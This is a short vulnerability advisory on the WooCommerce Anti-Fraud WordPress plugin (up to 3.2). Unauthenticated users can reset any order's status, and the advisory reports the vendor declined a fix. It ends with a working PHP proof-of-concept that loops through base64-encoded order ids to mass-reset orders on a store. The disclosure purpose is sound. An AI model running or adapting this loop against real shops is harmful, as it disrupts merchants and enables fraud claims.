WooCommerce Anti-Fraud <= 3.2 - Unauthenticated Order Status Manipulation

The WooCommerce Anti-Fraud WordPress plugin was affected by an issue where an unauthenticated user could change the order status of any order, as there were no checks when changing the order status. The order_id was also predictable.

On an individual level, if you have already received your order, you can set the order status back to Processing, which may have unintended consequences, such as being able to claim that your order has not been shipped yet.

On a bigger level, order ids can be looped from 1 to ++ and every order on the site can be set to Processing, requiring remediation by the owner before continuing business.

According to the original researcher, the vendor was contacted but was informed that the issue would not be fixed.

<?php
$site = "https://woocommerce-store-with-anti-fraud-installed.com";
for ($order_id = 1; $order_id <= PHP_INT_MAX; $order_id++) {
	$order_64 = base64_encode( $order_id );
	$url = "{$site}/?order_id={$order_64}&paypal_verification=true";
	$handle = fopen( $url, 'r' ); fclose( $handle );
}